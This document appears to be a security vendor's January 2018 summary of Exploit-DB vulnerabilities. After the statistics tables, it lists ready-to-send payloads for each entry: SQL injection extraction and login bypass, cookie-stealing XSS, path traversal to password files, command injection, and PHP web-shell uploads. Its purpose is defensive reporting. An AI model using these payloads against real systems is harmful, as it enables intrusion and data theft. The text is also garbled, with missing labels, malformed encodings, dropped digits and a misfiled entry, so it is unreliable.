EDB Analysis Report (2018.01)  2018.01.01 ~ 2018.01.31
Information classified by vulnerability, covering the vulnerabilities published on Exploit-DB (http://exploit-db.com).

Summary of analysis (author: Penta Security Systems, Security Evaluation Team)

The January 2018 EDB analysis report covers 50 published vulnerabilities in total. The attack type with the largest number of published vulnerabilities is SQL Injection. The attacks whose attack difficulty and risk level are both rated ' ' are also SQL Injection. Among the SQL Injection cases rated ' ' on both, the "Advantech WebAccess < 8.3" vulnerability is unusual in that the attack code is inserted between segments of the URL path. To prevent the vulnerabilities published in this EDB analysis report, including that one, we recommend applying the latest patches and practising secure coding. However, perfect secure coding is not achievable, so in order to maintain security over time, implementing defense in depth with a web application firewall should be considered.

1. Number of reports by vulnerability type

   Vulnerability type     Reports
   File Upload             2
   Command Injection       3
   (name missing)          5
   XSS                     8
   SQL Injection          32
   Total                  50

   (Chart: number of reports by vulnerability type)

2. Classification by risk level

   Risk level         Reports   Percentage
   (label missing)       37      74.00%
   (label missing)        3       6.00%
   (label missing)       10      20.00%
   Total                 50     100.00%

   (Chart: classification by risk level)

3. Distribution by attack difficulty

   Attack difficulty  Reports   Percentage
   (label missing)        3       6.00%
   (label missing)       31      62.00%
   (label missing)       16      32.00%
   Total                 50     100.00%

   (Chart: distribution by attack difficulty)

4. Vulnerability occurrences by major software

   Software name                                     Reports
   (name missing)                                     4
   CentOS Web                                         3
   (name missing)                                     2
   Local                                              2
   PACSOne Server                                     2
   Easy Car 2014                                      1
   Joomla! Component Picture Calendar for Joomla      1
   Quickad                                            1
   Gespage                                            1
   EMC xpression                                      1
   WordPress Service Finder Booking                   1
   Zechat                                             1
   Photos in Wifi                                     1
   LearnDash                                          1
   Smart Google Code Inserter                         1
   Muviko                                             1
   Buddy Zone                                         1
   Events Calendar                                    1
   Joomla! Component Visual Calendar                  1
   Shopware                                           1
   LiveCRM SaaS Cloud                                 1
   SAP NetWeaver J2EE Engine                          1
   Affiligator                                        1
   Xnami                                              1
   Wchat                                              1
   pfsense                                            1
   Tumder                                             1
   ImgHosting                                         1
   Flexible Poll                                      1
   Domains & Hostings Manager                         1
   Learning Management System                         1
   RISE                                               1
   Task Rabbit Clone                                  1
   ILIAS                                              1
   Multilanguage Real Estate MLM                      1
   Flash Operator                                     1
   Advantech WebAccess                                1
   Zomato Clone                                       1
   Joomla! Component CP Event Calendar                1
   Reservo Image Hosting                              1
   Hot s Clone                                        1
   SugarCRM                                           1
   Total                                             50

   (Chart: vulnerability occurrences by major software)
[2018-01-03] EDB-ID 43420 | SQL Injection | Smart Google Code Inserter < 3.5
  POST /wp-admin/options-general.php?page=smartcode HTTP/1.1
  action=saveadwords&delconf=&oid[]= OR =-- &ppccap[]=ex:mywplead&ppcpageid[]=&ppccode[]=bb&nchkdel=on

[2018-01-03] EDB-ID 43422 | SQL Injection | EMC xpression 4.5SP Patch 3 - 'model.jobhistoryid' SQL Injection
  /xdashboard/html/jobhistory/jobdochistorylist.action?model.jobhistoryid=736687378927029792022348433 and =2

[2018-01-05] EDB-ID 43447 | SQL Injection | Gespage 7.4.8
  POST /gespage/webapp/users/prnow.jsp HTTP/1.1
  show_prn=');select PG_SLEEP(3)--
  POST /ges/webapp/users/blhistory.jsp HTTP/1.1
  show_month=');select PG_SLEEP(3)--

[2018-01-08] EDB-ID 43457 | (category missing) | Photos in Wifi 1.0.1 - Path
  /asset.php?id=40c9c332-857b-4cb8-b848-59a30aa9cf3b&ext=[../not_allowed_directory/].[ext]

[2018-01-08] EDB-ID 43461 | File Upload | LearnDash 2.5.3 - Arbitrary File Upload
  POST / HTTP/1.1
  Connection: Close
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: ko-kr
  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
  Content-Type: multipart/form-data; boundary=---------------------------7dd0029908f2
  -----------------------------7dd0029908f2
  Content-Disposition: form-data; name="uploadfiles[]"; filename="@./shell.php.php
  Content-Type: application/octet-stream
  <?php echo exec("ls -la /etc/passwd");
  -----------------------------7dd0029908f2
  Content-Disposition: form-data; name="post"
  foobar
  -----------------------------7dd0029908f2
  Content-Disposition: form-data; name="course_id"
  foobar
  -----------------------------7dd0029908f2--

[2018-01-08] EDB-ID 43844 | SQL Injection | (software name missing) < 6.7.2-3429
  POST /photo/include/blog/label.php HTTP/1.1
  action=get_article_label&article_id=; SELECT version(); --

[2018-01-08] EDB-ID 43844 | (category missing) | (software name missing) < 6.7.2-3429
  POST /photo/include/file_upload.php?dir=2f2e2e2f406707073746f72652f50686f7 HTTP/1.1
  action=aviary_add&url=file:///etc/passwd

[2018-01-10] EDB-ID 43475 | (category missing) | WordPress Service Finder Booking < 3.2 - Local File Disclosure
  /wp-content/plugins/sfbooking/lib/downloads.php?file=/etc/passwd
[2018-01-10] EDB-ID 43477 | SQL Injection | Muviko 1.1
  POST /login.php HTTP/1.1
  email=admin@dmin.com'%2b(select*from(select(sleep(20)))a)%2b'&password=admxn&login=
  Additional reference information:
  # SQL Injection: load_season.php form parameter [GET] season_id
  # SQL Injection get_raring.php parameter [GET] movie_id
  # SQL Injection update_rating.php parameters [GET] rating,movie_id
  # SQL Injection set_player_source.php parameters [GET] id

[2018-01-10] EDB-ID 43479 | SQL Injection | Events Calendar - 'event_id' SQL Injection
  /event.php?event_id=- 23%20union%20all%20select%20,2,@@version,4,5,6,7,8,9,0,,2,3,4,5,6,7,8,9,20,2,22,23,24,25,26,27,28,29--

[2018-01-10] EDB-ID 43495 | SQL Injection | SAP NetWeaver J2EE Engine 7.40
  POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
  <soapenv:envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
    <soapenv:header/>
    <soapenv:body>
      <sec:deletepermissionbyid>
        <permissionid>' AND =(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-52%') AND ''='</permissionid>
      </sec:deletepermissionbyid>
    </soapenv:body>
  </soapenv:envelope>

[2018-01-12] EDB-ID 43535 | XSS | Xnami 1.0 - Cross-Site Scripting
  POST /media/ajax HTTP/1.1
  method=addcomment&comment="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&mediaid=6

[2018-01-15] EDB-ID 43560 | Command Injection | pfsense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
  /status_rrd_graph_img.php?database=queues;+printf+'ls - al'+'sh'

[2018-01-15] EDB-ID 43567 | XSS | ImgHosting 1.5
  /?search="><script>confirm(document.domain)<%2fscript>

[2018-01-15] EDB-ID 43569 | SQL Injection | Domains & Hostings Manager PRO 3.0 - Authentication Bypass
  POST /dhrpro_demo/login.php HTTP/1.1
  accusername=admin%27+or+%27%27%3d%27&accuserpassword=admin%27+or+%27%27%3d%27&login=+enter+

[2018-01-15] EDB-ID 43591 | SQL Injection | RISE 1.9 - 'search' SQL Injection
  POST /index.php/knowledge_base/get_article_suggestion/ HTTP/1.1
  search=product'%20and%20(select*from(select(sleep(20)))a)--%20

[2018-01-15] EDB-ID 43595 | Command Injection | ILIAS < 5.2.4
  /setup/setup.php?cmd="><script>alert()</script>

[2018-01-15] EDB-ID 43600 | Command Injection | Flash Operator 2.3.03 - Command Execution
  /ucp/index.php?quietmode=337&module=callforward&command=./ &ls -al

[2018-01-15] EDB-ID 43667 | File Upload | Zomato Clone - Arbitrary File Upload
  POST /demo/foodpanda/myacount.php HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20000 Firefox/57.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Disposition: form-data; name="fname"
  Content-Disposition: form-data; name="lname"
  Content-Disposition: form-data; name="email"
  @.com
  Content-Disposition: form-data; name="phone"
  23
  Content-Disposition: form-data; name="image"; filename="info.php.jpg" (change extension to .php)
  Content-Type: image/jpeg
  <?php phpinfo();?>
  Content-Disposition: form-data; name="addr"
  Content-Disposition: form-data; name="addr2"
  Content-Disposition: form-data; name="post"
  Content-Disposition: form-data; name="country"
  Content-Disposition: form-data; name="state"
  3945
  Content-Disposition: form-data; name="city"
  635
  Content-Disposition: form-data; name="location"
  Content-Disposition: form-data; name="update"
  Upload
  --

[2018-01-17] EDB-ID 43676 | XSS | Reservo Image Hosting 1.5
  /search/?s=image&t=%27%29%3b%2522%2520style%253d%22%3cscript%3ealert%28%29%3c%2fscript%3e%3c

[2018-01-17] EDB-ID 43683 | XSS | SugarCRM 3.5.1
  /index.php?action=login&module=users&print=a&"/><script>alert('xss')</script>

[2018-01-21] EDB-ID 43849 | XSS | Shopware 5.2.5/5.3
  POST /backend/customer/ HTTP/1.1
  {"id":22,"groupkey":"ek","email":"test@test.de","active":true,"accountmode":0,"confirmationkey":"","paymentid":5,"firstlogin":"206-08-8T00:00:00","lastLogin":"206-08-8T7:22:23","newsletter":0,"validation":0,"languageid":,"shopid":,"pricegroupid":0,"internalcomment":"testcomment","failedlogins":0,"referer":"","default_billing_address_id":22,"default_shipping_address_id":22,"newpassword":"","amount":402.9,"ordercount":,"canceledorderamount":0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":"6.05.985","title":"","salutation":"mr","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","lastname":"test[injected SCRIPT CODE]>"<iframe "number":"20028","billing":[{"id":22,"salutation":"mr","company":"","department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",,"additionaladdressline":"","additionaladdressline2":"","salutationsnippet":"herr","countryid":2,"number":"","phone":"","vatId":"","stateId":null}],"shipping":[{"id":23,"salutation":"mr","company":"","department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe,"additionalAddressLine":"","additionaladdressline2":"","salutationsnippet":"herr","countryid":2,"stateid":null}],"debit":[],"paymentdata":[{"accountnumber":"","bankcode":"","bankname":"","accountholder":"","bic":"","iban":"","usebillingdata":false,"id":null}]}

[2018-01-21] EDB-ID 43850 | XSS | CentOS Web 0.9.8.12
  POST /backend/customer/ HTTP/1.1
  (The request body listed for this row is the same JSON as the Shopware EDB-ID 43849 entry above.)

[2018-01-21] EDB-ID 43850 | XSS | CentOS Web 0.9.8.12
  POST /index.php?module=mail_add-new HTTP/1.1
  ifpost=yes&email_address="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&domain=domain.com&password="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>

[2018-01-23] EDB-ID 43855 | XSS | CentOS Web 0.9.8.12 - 'row_id' / 'domain' SQL Injection
  POST /index.php?module=list_domains HTTP/1.1
  ifpost=yes&username=&domain=' or =--&row_id=' or =- -

[2018-01-23] EDB-ID 43860 | SQL Injection | LiveCRM SaaS Cloud 1.0
  /livecrm/web/index.php?r=site/login&company_id=%3%20%4f%52%20%3%20%47%52%4f%55%50%20%42%59%20%43%4f%4e%43%4%54%5f%57%53%28%30%78%33%6%2c%56%45%52%53%49%4f%4e%28%29%2c%46%4c%4f%4f%52%28%52%4%4e%44%28%30%29%2a%32%29%29%20%48%4%56%49%4e%47%20%4d%49%4e%28%30%29%20%4f%52%20%3

[2018-01-23] EDB-ID 43861 | SQL Injection | Affiligator 2.1.0
  /search/?q=&price_type=range&price=%3%30%30%20%6%6e%64%28%73%65%6c%65%63%74%2%56%65%72%4%79%6%72%69%2d%7e%30%2e%20%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%6%74%28%56%65%72%73%69%6f%6e%28%29%29%29%79%29%78%29

[2018-01-23] EDB-ID 43863 | SQL Injection | Easy Car 2014
  /site_search.php?s_vehicletype=auto&s_order=[sql]&s_row=%35%3%20%2f%2a%2%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%2%30%35%35%35%35%4%6e%6%6c%79%73%65%2a%2f%20%28%65%78%74%72%6%63%74%76%6%6c%75%65%28%30%2c%2f%2a%2%30%35%35%35%35%63%6f%6e%63%6%74%2a%2f%28%30%78%32%37%2c%30%78%33%6%2c%40%40%76%65%72%73%69%6f%6e%2c%64%6%74%6%62%6%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d

[2018-01-23] EDB-ID 43864 | SQL Injection | Wchat 1.5
  POST /login.php HTTP/1.1
  User=' UNION ALL SELECT 0x3,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x33,0x34--&Pass=anything

[2018-01-23] EDB-ID 43865 | SQL Injection | Zechat 1.5
  POST /login.php HTTP/1.1
  User=' UNION ALL SELECT 0x3,0x32,0x33,concat(0x63)--&Pass=anything
[2018-01-23] EDB-ID 43866 | SQL Injection | Tumder 2.1
  /category/%2d%33%20%20%2f%2a%2%30%3%3%3%3%55%4e%49%4f%4e%2a%2f%20%2f%2a%2%30%3%3%3%3%4%4c%4c%2a%2f%20%2f%2a%2%30%3%3%3%3%53%45%4c%45%43%54%2a%2f%20%30%78%33%3%2c%30%78%33%32%2c%43%4f%4e%43%4%54%28%44%6%74%6%62%6%73%65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44%4%54%4%42%4%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%28%29%29%2d%2d%20%2d

[2018-01-23] EDB-ID 43868 | SQL Injection | Quickad 4.0
  /listing?keywords=' UNION ALL SELECT NULL,CONCAT(version(),0x7e7e,database()),NULL-- gllf&location=all%20united%20states&placetype=country&placeid=23[sql]&cat=[sql]&subcat=5[sql]&filter=&sort=newest&submit=

[2018-01-23] EDB-ID 43869 | SQL Injection | Flexible Poll 1.2
  /mobile_preview.php?id=- 74'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--

[2018-01-23] EDB-ID 43870 | SQL Injection | Local 1.0
  /sellers_subcategories.php?industryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x307832383333239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--

[2018-01-24] EDB-ID 43870 | SQL Injection | Local 1.0
  /suppliers.php?industryid=[sql]&categoryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x307832383333239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--

[2018-01-26] EDB-ID 43901 | SQL Injection | Learning Management System - 'course_id' SQL Injection
  /?type=scoring-status-student&course_id=- 999999+union+select+,2,3,user()%23

[2018-01-28] EDB-ID 43907 | (category missing) | PACSOne Server 6.6.2 DICOM Web Viewer - Traversal
  /pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
  /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd

[2018-01-28] EDB-ID 43908 | SQL Injection | PACSOne Server 6.6.2 DICOM Web Viewer
  POST /pacs/usersignup.php HTTP/1.1
  hostname=localhost&database=dicom&username=- 999999+union+select+,2,3,user()%23&password=22222222&firstname=&lastname=&email=- 999999+union+select+,2,3,user()%23&action=Sign+Up

[2018-01-28] EDB-ID 43914 | SQL Injection | Task Rabbit Clone 1.0 - 'id' SQL Injection
  /pages/single_blog.php?id=%3%20%20%2f%2a%2%3%33%33%33%37%55%4e%49%4f%4e%2a%2f%20%2f%2a%2%3%33%33%33%37%53%45%4c%45%43%54%2a%2f%20%3%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d

[2018-01-28] EDB-ID 43915 | SQL Injection | (software name missing) 1.0
  POST /index.php HTTP/1.1
  User=' OR -- -&Pass=bypass

[2018-01-28] EDB-ID 43915 | SQL Injection | (software name missing) 1.0
  /site.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38%38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%33%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%65%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6%6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a%2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d

[2018-01-28] EDB-ID 43915 | SQL Injection | (software name missing) 1.0
  /pagelist.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38%38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%33%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%65%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6%6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a%2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d

[2018-01-28] EDB-ID 43915 | SQL Injection | (software name missing) 1.0
  /page_new.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38%38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%33%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%65%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6%6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a%2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d

[2018-01-28] EDB-ID 43916 | SQL Injection | Hot s Clone - 'subctid' SQL Injection
  /categories?keyword=&mctid=[sql]&subctid=- Y2h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-

[2018-01-28] EDB-ID 43917 | SQL Injection | Multilanguage Real Estate MLM 3.0 - 'srch' SQL Injection
  /productlist.php?srch=%73%66%64%27%29%20%20%2f%2a%2%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%28%3%29%2c%28%32%29%2c%43%4f%4e%43%4%54%5f%57%53%28%30%78%32%30%33%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%34%29%29%2d%2d%20%2d

[2018-01-28] EDB-ID 43918 | SQL Injection | Buddy Zone 2.9.9
  /chat_im/chat_window.php?request_id=- 55++/*!3337UNION*/+/*!3337SELECT*/+,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+-

[2018-01-30] EDB-ID 43928 | SQL Injection | Advantech WebAccess < 8.3
  /BWMobileService/BWScadaRest.svc/Login/notadmin'%20or%20'x'%3D'x/nopass/

[2018-01-30] EDB-ID 43931 | (category missing) | Joomla! Component Picture Calendar for Joomla 3.1.4 -
  /list.php?folder=../../../../etc/passwd

[2018-01-30] EDB-ID 43932 | SQL Injection | Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection
  /index.php?option=com_cpeventcalendar&task=load&id=%2d%3%20%20%2f%2a%2%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a%2%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203a20,user(),database(),version())%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d

[2018-01-30] EDB-ID 43933 | SQL Injection | Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection
  /index.php?option=com_visualcalendar&view=load&id=- %20%20/*!06666UNION*/%20/*!06666SELECT*/%20(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d674696f6e5f736368656d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b,4,0x30),0x3a20,table_name,0x3c62723e))))x)%2c0x32%2c0x33%2c0x34%2c0x35%2c0x36%2d%2d%20%2d